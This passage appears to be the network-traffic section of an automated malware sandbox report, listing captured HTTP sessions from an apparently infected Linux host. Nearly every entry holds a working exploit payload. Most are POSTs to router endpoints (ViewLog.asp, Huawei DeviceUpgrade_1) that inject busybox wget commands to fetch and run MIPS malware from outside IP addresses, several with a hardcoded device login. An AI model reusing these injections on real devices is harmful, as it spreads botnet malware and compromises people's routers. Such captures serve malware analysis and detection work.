                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:32.450764894 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              428192.168.2.145118431.136.78.128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:31.519510031 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:34.722675085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:40.866408110 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.897955894 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.496880054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              429192.168.2.144949894.121.31.778080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:31.558276892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              430192.168.2.144292285.122.218.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:31.908200979 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              431192.168.2.143798662.34.72.488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:31.963680029 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:32.514750957 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:33.602729082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              432192.168.2.145646894.120.42.1508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:32.011050940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              433192.168.2.144311062.202.157.868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:32.076515913 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              434192.168.2.1451080156.241.82.21737215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:32.493865013 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:36.514595032 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:42.658341885 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:54.689838886 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:20.544783115 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
